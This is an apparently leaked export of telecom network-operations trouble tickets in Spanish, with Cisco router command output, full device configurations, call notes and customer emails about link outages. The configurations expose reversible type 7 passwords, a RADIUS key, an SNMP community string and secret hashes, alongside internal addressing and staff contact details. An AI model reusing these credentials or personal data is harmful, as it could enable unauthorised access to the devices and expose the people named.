BV1                            UP             UP       *** INTERFACE WAN HACIA CORE ***
BV2                            UP             UP       *** GESTION CPE ***
FA0                            DOWN           DOWN
FA1                            DOWN           DOWN
FA2                            DOWN           DOWN
FA3                            DOWN           DOWN
VL1                            DOWN           DOWN     *** PUBLICA / LAN CLIENTE ***
MPLS_GRANJERO_G115#
MPLS_GRANJERO_G115#
MPLS_GRANJERO_G115#
MPLS_GRANJERO_G115#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 - REPLICATED ROUTE, % - NEXT HOP OVERRIDE
GATEWAY OF LAST RESORT IS NOT SET
      10.0.0.0/8 IS VARIABLY SUBNETTED, 3 SUBNETS, 2 MASKS
S        10.10.4.0/24 [1/0] VIA 10.13.56.1
C        10.13.56.0/24 IS DIRECTLY CONNECTED, BVI2
L        10.13.56.7/32 IS DIRECTLY CONNECTED, BVI2
MPLS_GRANJERO_G115# SH IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
ATM0                       UNASSIGNED      YES UNSET  UP                    UP
ATM0.1                     UNASSIGNED      YES UNSET  UP                    UP
ATM0.2                     UNASSIGNED      YES UNSET  UP                    UP
BRI0                       UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
BRI0:1                     UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
BRI0:2                     UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
BVI1                       UNASSIGNED      YES UNSET  UP                    UP
BVI2                       10.13.56.7      YES NVRAM  UP                    UP
FASTETHERNET0              UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET1              UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET2              UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET3              UNASSIGNED      YES UNSET  DOWN                  DOWN
VLAN1                      UNASSIGNED      YES UNSET  DOWN                  DOWN
MPLS_GRANJERO_G115#SH INT DESC
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
AT0                            UP             UP
AT0.1                          UP             UP
AT0.2                          UP             UP
BR0                            ADMIN DOWN     DOWN
BR0:1                          ADMIN DOWN     DOWN
BR0:2                          ADMIN DOWN     DOWN
BV1                            UP             UP       *** INTERFACE WAN HACIA CORE ***
BV2                            UP             UP       *** GESTION CPE ***
FA0                            DOWN           DOWN
FA1                            DOWN           DOWN
FA2                            DOWN           DOWN
FA3                            DOWN           DOWN
VL1                            DOWN           DOWN     *** PUBLICA / LAN CLIENTE ***
MPLS_GRANJERO_G115#SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.13.56.1             34   001E.F741.BD40  ARPA   BVI2
INTERNET  10.13.56.7              -   0000.0C52.8A98  ARPA   BVI2
MPLS_GRANJERO_G115#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ATM0                          0         0         0        11      1000         1      1000         1         0
* ATM0.1                        -         -         -         -         -         -         -         -         -
* ATM0.2                        -         -         -         -         -         -         -         -         -
  BRI0                          0         0         0         0         0         0         0         0         0
  BRI0:1                        0         0         0         0         0         0         0         0         0
  BRI0:2                        0         0         0         0         0         0         0         0         0
* BVI1                          0         0         0         0         0         0         0         0         0
* BVI2                          1         0         0         0      1000         1      1000         1         0
  FASTETHERNET0                 0         0         0         0         0         0         0         0         0
  FASTETHERNET1                 0         0         0         0         0         0         0         0         0
  FASTETHERNET2                 0         0         0         0         0         0         0         0         0
  FASTETHERNET3                 0         0         0         0         0         0         0         0         0
  VLAN1                         0         0         0         0         0         0         0         0         0
NOTE:NO SEPARATE COUNTERS ARE MAINTAINED FOR SUBINTERFACES
     HENCE DETAILS OF SUBINTERFACE ARE NOT SHOWN
MPLS_GRANJERO_G115#SH LOG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65 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 61 MESSAGE LINES LOGGED
        LOGGING TO 10.10.4.100  (UDP PORT 514, AUDIT DISABLED,
              LINK UP),
              60 MESSAGE LINES LOGGED,
              0 MESSAGE LINES RATE-LIMITED,
              0 MESSAGE LINES DROPPED-BY-MD,
              XML DISABLED, SEQUENCE NUMBER DISABLED
              FILTERING DISABLED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
LOG BUFFER (4096 BYTES):
JUL  4 14:17:25.027: %SNMP-5-COLDSTART: SNMP AGENT ON HOST MPLS_GRANJERO_G115 IS UNDERGOING A COLD START
*JUL  4 14:17:25.111: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
*JUL  4 14:17:25.111: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
*JUL  4 14:17:25.111: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE BVI1, CHANGED STATE TO UP
*JUL  4 14:17:25.115: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE BVI2, CHANGED STATE TO UP
*JUL  4 14:17:25.123: %SYS-6-LOGGINGHOST_STARTSTOP: LOGGING TO HOST 10.10.4.100 PORT 514 STARTED - CLI INITIATED
*JUL  4 14:17:27.267: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0, CHANGED STATE TO DOWN
*JUL  4 14:17:27.279: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*JUL  4 14:17:27.295: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO DOWN
*JUL  4 14:17:27.303: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET3, CHANGED STATE TO DOWN
*JUL  4 14:17:36.035: %LINK-3-UPDOWN: INTERFACE BVI1, CHANGED STATE TO DOWN
*JUL  4 14:17:36.035: %LINK-3-UPDOWN: INTERFACE BVI2, CHANGED STATE TO DOWN
*JUL  4 14:17:37.035: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE BVI1, CHANGED STATE TO DOWN
*JUL  4 14:17:37.035: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE BVI2, CHANGED STATE TO DOWN
*JUL  4 14:17:45.627:  DSL 0 CONTROLLER LINK UP! LINE RATE: 1152 KBPS
*JUL  4 14:17:45.627: %CONTROLLER-5-UPDOWN: CONTROLLER DSL 0, CHANGED STATE TO UP
*JUL  4 14:17:55.283: %LINK-3-UPDOWN: INTERFACE ATM0, CHANGED STATE TO UP
*JUL  4 14:17:56.283: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0, CHANGED STATE TO UP
*JUL  4 14:17:57.283: %LINK-3-UPDOWN: INTERFACE BVI1, CHANGED STATE TO UP
*JUL  4 14:17:57.283: %LINK-3-UPDOWN: INTERFACE BVI2, CHANGED STATE TO UP
*JUL  4 14:17:58.283: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE BVI1, CHANGED STATE TO UP
*JUL  4 14:17:58.283: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE BVI2, CHANGED STATE TO UP
*JUL  4 14:19:57.523: %LINK-3-UPDOWN: INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*JUL  4 14:19:58.523: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO UP
*JUL  4 14:20:26.543: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*JUL  5 20:02:28.884: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*JUL  5 20:02:28.884: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*JUL  5 20:02:29.892: %LINK-3-UPDOWN: INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*JUL  5 22:24:54.260: %CONTROLLER-5-UPDOWN: CONTROLLER DSL 0, CHANGED STATE TO DOWN
*JUL  5 22:24:56.260: %LINK-3-UPDOWN: INTERFACE ATM0, CHANGED STATE TO DOWN
*JUL  5 22:24:57.260: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0, CHANGED STATE TO DOWN
*JUL  5 22:24:57.304: %LINK-3-UPDOWN: INTERFACE BVI1, CHANGED STATE TO DOWN
*JUL  5 22:24:57.304: %LINK-3-UPDOWN: INTERFACE BVI2, CHANGED STATE TO DOWN
*JUL  5 22:24:58.304: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE BVI1, CHANGED STATE TO DOWN
*JUL  5 22:24:58.304: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE BVI2, CHANGED STATE TO DOWN
*JUL  5 22:25:23.140:  DSL 0 CONTROLLER LINK UP! LINE RATE: 1152 KBPS
*JUL  5 22:25:23.140: %CONTROLLER-5-UPDOWN: CONTROLLER DSL 0, CHANGED STATE TO UP
*JUL  5 22:25:27.304: %LINK-3-UPDOWN: INTERFACE ATM0, CHANGED STATE TO UP
*JUL  5 22:25:27.304: %LINK-3-UPDOWN: INTERFACE BVI1, CHANGED STATE TO UP
*JUL  5 22:25:27.304: %LINK-3-UPDOWN: INTERFACE BVI2, CHANGED STATE TO UP
*JUL  5 22:25:28.304: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0, CHANGED STATE TO UP
*JUL  5 22:25:28.304: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE BVI1, CHANGED STATE TO UP
*JUL  5 22:25:28.304: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE BVI2, CHANGED STATE TO UP
*JUL  5 22:35:18.631: %LINK-5-CHANGED: INTERFACE FASTETHERNET1, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUL  5 22:35:22.487: %LINK-3-UPDOWN: INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*JUL  5 22:35:23.951: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY GESTIONIP ON VTY0 (10.13.56.1)
MPLS_GRANJERO_G115#SH CLOCK
*23:04:16.267 UTC TUE JUL 5 2022
MPLS_GRANJERO_G115#SH VER
CISCO IOS SOFTWARE, C880 SOFTWARE (C880DATA-UNIVERSALK9-M), VERSION 15.2(4)M4, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2013 BY CISCO SYSTEMS, INC.
COMPILED THU 20-JUN-13 16:47 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 12.4(22R)YB5, RELEASE SOFTWARE (FC1)
MPLS_GRANJERO_G115 UPTIME IS 1 DAY, 8 HOURS, 47 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH:C880DATA-UNIVERSALK9-MZ.152-4.M4.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88 (MPC8300) PROCESSOR (REVISION 1.0) WITH 236544K/25600K BYTES OF MEMORY.
PROCESSOR BOARD ID FTX174384PZ
1 DSL CONTROLLER
4 FASTETHERNET INTERFACES
1 ISDN BASIC RATE INTERFACE
1 ATM INTERFACE
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
256K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
125440K BYTES OF ATA COMPACTFLASH (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#   PID                   SN
-------------------------------------------------
*0        CISCO888-SEC-K9       FTX174384PZ
LICENSE INFORMATION FOR 'C880-DATA'
    LICENSE LEVEL: ADVIPSERVICES   TYPE: PERMANENT
    NEXT REBOOT LICENSE LEVEL: ADVIPSERVICES
CONFIGURATION REGISTER IS 0X2102
MPLS_GRANJERO_G115# SH INVENTORY
NAME: "888", DESCR: "888 CHASSIS, HW SERIAL#: FTX174384PZ, HW REVISION: 1.0"
PID: CISCO888-SEC-K9   , VID: V01, SN: FTX174384PZ
MPLS_GRANJERO_G115#SH PROCESSES CPU HISTORY
MPLS_GRANJERO_G115   11:04:18 PM TUESDAY JUL 5 2022 UTC
      222211111111112222211111111112222211111111111111122222111112
  100
   90
   80
   70
   60
   50
   40
   30
   20
   10
     0....5....1....1....2....2....3....3....4....4....5....5....6
               0    5    0    5    0    5    0    5    0    5    0
               CPU% PER SECOND (LAST 60 SECONDS)
                                      1
      233222222333323232322222233222237222232232223232232222222222
  100
   90
   80
   70
   60
   50
   40
   30
   20                                 *
   10                                 *
     0....5....1....1....2....2....3....3....4....4....5....5....6
               0    5    0    5    0    5    0    5    0    5    0
               CPU% PER MINUTE (LAST 60 MINUTES)
              * = MAXIMUM CPU%   # = AVERAGE CPU%
      33444544544454444465444444444544
  100
   90
   80
   70
   60
   50
   40
   30
   20
   10      *  *   *     **         *
     0....5....1....1....2....2....3....3....4....4....5....5....6....6....7..
               0    5    0    5    0    5    0    5    0    5    0    5    0
                   CPU% PER HOUR (LAST 72 HOURS)
                  * = MAXIMUM CPU%   # = AVERAGE CPU%
MPLS_GRANJERO_G115# SH RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4541 BYTES
!
! LAST CONFIGURATION CHANGE AT 22:35:23 UTC TUE JUL 5 2022 BY GESTIONIP
VERSION 15.2
NO SERVICE PAD
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME MPLS_GRANJERO_G115
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
NO LOGGING CONSOLE
ENABLE PASSWORD 7 041F04160033581D0A
!
AAA NEW-MODEL
!
!
AAA AUTHENTICATION LOGIN DEFAULT GROUP RADIUS LOCAL
AAA AUTHENTICATION ENABLE DEFAULT ENABLE
AAA AUTHORIZATION EXEC DEFAULT GROUP RADIUS LOCAL
AAA ACCOUNTING EXEC DEFAULT START-STOP GROUP RADIUS
!
!
!
!
!
AAA SESSION-ID COMMON
MEMORY-SIZE IOMEM 10
!
!
!
!
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
!
!
MULTILINK BUNDLE-NAME AUTHENTICATED
LICENSE UDI PID CISCO888-SEC-K9 SN FTX174384PZ
!
!
USERNAME LOCAL PASSWORD 7 0507090C2040
!
!
!
!
!
CONTROLLER DSL 0
 MODE ATM
 DSL-MODE SHDSL SYMMETRIC ANNEX B
!
!
!
!
!
!
BRIDGE IRB
!
!
!
!
INTERFACE BRI0
 NO IP ADDRESS
 ENCAPSULATION HDLC
 SHUTDOWN
 ISDN TERMINATION MULTIDROP
!
INTERFACE ATM0
 NO IP ADDRESS
 NO ATM ILMI-KEEPALIVE
!
INTERFACE ATM0.1 POINT-TO-POINT
 BRIDGE-GROUP 1
 PVC 0/33
  ENCAPSULATION AAL5SNAP
 !
!
INTERFACE ATM0.2 POINT-TO-POINT
 BRIDGE-GROUP 2
 PVC 0/34
  ENCAPSULATION AAL5SNAP
 !
!
INTERFACE FASTETHERNET0
 BANDWIDTH 1000
 NO IP ADDRESS
!
INTERFACE FASTETHERNET1
 NO IP ADDRESS
!
INTERFACE FASTETHERNET2
 NO IP ADDRESS
!
INTERFACE FASTETHERNET3
 NO IP ADDRESS
!
INTERFACE VLAN1
 DESCRIPTION *** PUBLICA / LAN CLIENTE ***
 BANDWIDTH 1000
 NO IP ADDRESS
 BRIDGE-GROUP 1
!
INTERFACE BVI1
 DESCRIPTION *** INTERFACE WAN HACIA CORE ***
 BANDWIDTH 1000
 NO IP ADDRESS
!
INTERFACE BVI2
 DESCRIPTION *** GESTION CPE ***
 BANDWIDTH 1000
 IP ADDRESS 10.13.56.7 255.255.255.0
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
!
IP ROUTE 10.10.4.0 255.255.255.0 10.13.56.1
!
IP RADIUS SOURCE-INTERFACE BVI2
LOGGING HOST 10.10.4.100
ACCESS-LIST 190 PERMIT TCP 66.119.95.0 0.0.0.255 ANY EQ TELNET
ACCESS-LIST 190 PERMIT TCP 192.168.0.0 0.0.255.255 ANY EQ TELNET
ACCESS-LIST 190 PERMIT TCP 10.10.0.0 0.0.255.255 ANY EQ TELNET
!
SNMP-SERVER COMMUNITY COYOTE_UGLY RO
!
RADIUS SERVER FREERADIUS
 ADDRESS IPV4 10.10.4.100 AUTH-PORT 1812 ACCT-PORT 1813
 KEY 7 03105E1812062F4B1F5B4A
!
!
!
CONTROL-PLANE
!
BRIDGE 1 PROTOCOL IEEE
BRIDGE 1 ROUTE IP
BRIDGE 2 PROTOCOL IEEE
BRIDGE 2 ROUTE IP
!
BANNER EXEC ^CC
||===================================================||
||  ______   _       _                               ||
|| (_) |    | |     | |              O               ||
||     | _  | |  _  | |  __   _  _       __   __,    ||
||   _ ||/  |/  |/  |/  /  \_/ |/ |  |  /    /  |    ||
||  (_/ |__/|__/|__/|__/\__/   |  |_/|_/\___/\_/|_/  ||
||                  |\                               ||
||                  |/                               ||
||ADVERTENCIA!!                                      ||
||USTED DEBE TENER AUTORIZACION PREVIA PARA EL ACCESO||
||A ESTE SISTEMA. SE REGISTRAN Y SE SUPERVISAN TODAS ||
||LAS CONEXIONES.                                    ||
||===================================================||
^C
BANNER LOGIN ^CC
####################################################################
#          ______   _       _                                      #
#         (_) |    | |     | |              O                      #
#             | _  | |  _  | |  __   _  _       __   __,           #
#           _ ||/  |/  |/  |/  /  \_/ |/ |  |  /    /  |           #
#          (_/ |__/|__/|__/|__/\__/   |  |_/|_/\___/\_/|_/         #
#                          |\                                      #
#                          |/                                      #
#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
^C
!
LINE CON 0
 PASSWORD 7 1311441E580B112B3F
 NO MODEM ENABLE
 TRANSPORT OUTPUT ALL
LINE AUX 0
 TRANSPORT OUTPUT ALL
LINE VTY 0 4
 PASSWORD 7 051F5503724B5B080D
 LOGIN AUTHENTICATION RADIUS
 TRANSPORT INPUT ALL
 TRANSPORT OUTPUT ALL
!
SCHEDULER MAX-TASK-TIME 5000
NTP SERVER 10.10.4.100
!
END</t>
  </si>
  <si>
    <t>F4629256</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLEGA AL CHASSIS CTC Y AL EQUIPO DEL NODO SIN PROBLEMAS EL INCONVENENINTE PARACE SER DE EL LADO DEL CLIENTE. SE LLAMARA AL CLIENTE PARA PODER REALIZAR PRUEBAS CON EQUIPOS.
CHASSIS 	SLOT 	SIDE 	TYPE 	VERSION
00 	12 	REMOTE A 	1000EAS-X 	1.300-1.044-0.000-0.000
    FIBER 1
    FIBER 2
    UTP 3
    UTP 4
    DEVICE
    SYSTEM
    1Q VLAN
    STORMCONTROL
    LOOPPROTECT
    COUNTERS
    SFP
UTP3 STATUS AND CONFIGURATION
LINK 	SPEED 	DUPLEX
UP 	1000BASE-T 	FULL
PORT ACTIVE 	
NEGOTIATION 	
INGRESS RATE LIMIT (64K ~ 990M) 	
EGRESS RATE LIMIT 	
LINK LOSS FORWARDING EVENT(ETHERNET DISABLE)
LOGIC 	FIBER 1 RX LOSS 	FIBER 2 RX LOSS
&lt;EESCGTESN1T1A03B02EIM3&gt;DIS IP ROUTING-TABLE VP GESTION_CTC_UNION 10.174.24.251
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : GESTION_CTC_UNION
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.174.24.251/32  DIRECT  0    0                 0.0.0.0         VLANIF239
&lt;EESCGTESN1T1A03B02EIM3&gt;TELNET  VP GESTION_CTC_UNION 10.174.24.251              TRYING 10.174.24.251 ...</t>
  </si>
  <si>
    <t>F4629295</t>
  </si>
  <si>
    <t>SE LLAMO A MONITOREO DE CAJERO 5B ATIENE OSCAR PORTILLO QUIEN INDICA QUE SE TUVIERON PROBLEMAS CON LA ENERGÍA ELECTRICA Y QUE EL PROBLEMA YA FUE RESUELTO
RESULTADO: LLAMADA HECHA
NOMBRE: 24207210
NÚMERO: 24207210
INICIO: HOY, 13:25
FIN: HOY, 13:30
DURACIÓN: 4:19
ID DE LLAMADA: 1001140315</t>
  </si>
  <si>
    <t>F4629342</t>
  </si>
  <si>
    <t>-* SE HABLA CON EVELIN (EJECUTIVA) INFORMA QUE HAY UNA PERSONA EN SITIO QUE ESTA REALIZANDO PRUEBAS, COLOCA EN TRIPARTITA A EDGAR (CLIENTE)  COMENTA QUE ELLOS SE CONECTAN A VARIOS REPETIDORES, SE CONECTA DIRECTO AL CPE CISCO G001 // SE REALIZA CONFERENCIA CON WAGNER POLANCO (GESTOR) PARA VERIFICACIONES Y/O PRUEBAS -*
-*</t>
  </si>
  <si>
    <t>F4629380</t>
  </si>
  <si>
    <t>***---  SE RESPONDE CORREO DE CL  DONDE INDICA CONTACTOS EN SITIO Y SOLIICTA SE LE INFORME SI SE DESCARTARON PROBLEMAS DE TRANSMISIÓN --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 6 DE JULIO DE 2022 00:28
PARA: WILSON LUNA &lt;WILSONLUNA@ICASA.COM.GT&gt;; BRYAN STEVE PEREZ MENDOZA &lt;BRYANS.PEREZ@CLARO.COM.GT&gt;
CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE MEGA 18 SECUNDARIO (192.168.50.21) CLARO ID:58700010 , DOWN
BUENOS DÍAS ESTIMADO SR. LUNA.
                GRACIAS POR LA INFORMACIÓN, SE NOTIFICA AL PERSONAL  CARGO PARA EL SEGUIMIENTO.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: WILSON LUNA [MAILTO:WILSONLUNA@ICASA.COM.GT]
ENVIADO EL: MIÉRCOLES, 6 DE JULIO DE 2022 00:07
PARA: BRYAN STEVE PEREZ MENDOZA &lt;BRYANS.PEREZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTES VIP &lt;CLIENTESVIP@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;
ASUNTO: RE: ENLACE MEGA 18 SECUNDARIO (192.168.50.21) CLARO ID:58700010 , DOWN
BUENAS NOCHES,
POR FAVOR CONTACTAR A PUNTO REMOTO A PARTIR DE LAS 07:00HRS, PODRÍAN CONFIRMARNOS QUE HAYAN DESCARTADO PROBLEMAS EN SU MEDIO DE TRANSMISIÓN POR FAVOR.
SALUDOS.</t>
  </si>
  <si>
    <t>F4629387</t>
  </si>
  <si>
    <t xml:space="preserve">ALARMA DE ENERGIA HACE 8 MIN SE PORCEDE CON CIERRE
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 8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204 UPTIME IS 8 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 02:56:48 UTC WED JUL 6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2485FE
6 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX162485FE
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_0204#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4738 BYTES
!
! NO CONFIGURATION CHANGE SINCE LAST RESTART
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_0204
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 4 EFGGPN07/DWJB.UGZOURJMJZHPAPLRUWH/NVNVXUK6.
!
NO AAA NEW-MODEL
!
NO IPV6 CEF
!
!
!
!
!
NO IP DOMAIN LOOKUP
IP CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX162485FE
!
!
USERNAME GESTIONIP SECRET 4 J97D2KYDSNA1WFDCO/9OZ72YEJCXHSGT1W6FUL8O/O.
!
!
BRIDGE IRB
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.107.163 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN REDUNDANTE/_/8901532T/_/
 BANDWIDTH 2048
 IP ADDRESS 10.72.190.136 255.255.255.192
 NO IP REDIRECTS
 NO IP UNREACHABLES
 NO IP PROXY-ARP
 RATE-LIMIT INPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 IP OSPF NETWORK POINT-TO-POINT
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN PRINCIPAL/_/8900647T/_/
 BANDWIDTH 4096
 IP ADDRESS 10.72.190.9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0
 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/1/1
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/1/2
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/1/3
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.166.41.126 255.255.255.0 SECONDARY
 IP ADDRESS 10.162.204.126 255.255.255.0 SECONDARY
 IP ADDRESS 10.132.4.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.162.4.126 255.255.255.0
 NO AUTOSTATE
!
INTERFACE BVI1
 DESCRIPTION ** PRINCIPAL ID 8900647 **
 BANDWIDTH 512
 NO IP ADDRESS
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
!
ROUTER OSPF 1
 ROUTER-ID 10.72.190.9
 AREA 164 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.72.190.0 0.0.0.63 AREA 164
 NEIGHBOR 10.72.190.1
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.72.190.129 225 NAME REDUNDANCIA_WX
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 10.162.204.0/24
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.166.41.0/24
IP PREFIX-LIST CONNECTED SEQ 15 PERMIT 10.162.4.0/24
IP PREFIX-LIST CONNECTED SEQ 20 PERMIT 10.212.107.163/32
IP PREFIX-LIST CONNECTED SEQ 25 PERMIT 10.132.4.16/29
!
IP PREFIX-LIST RED_LAN SEQ 5 PERMIT 10.161.242.0/24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2 AVENIDA 2-53 ZONA 1 BARRIO BRISAS DEL CUTZAN CHICACAO SUCHITEPEQUEZ
SNMP-SERVER ENABLE TRAPS ENTITY-SENSOR THRESHOLD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204#
LOG DEL ROUTER CPE:
SHOW LO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8192 BYTES):
JAN  2 12:00:02.587: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
JUL  6 02:57:10.727: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUL  6 02:57:10.727: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
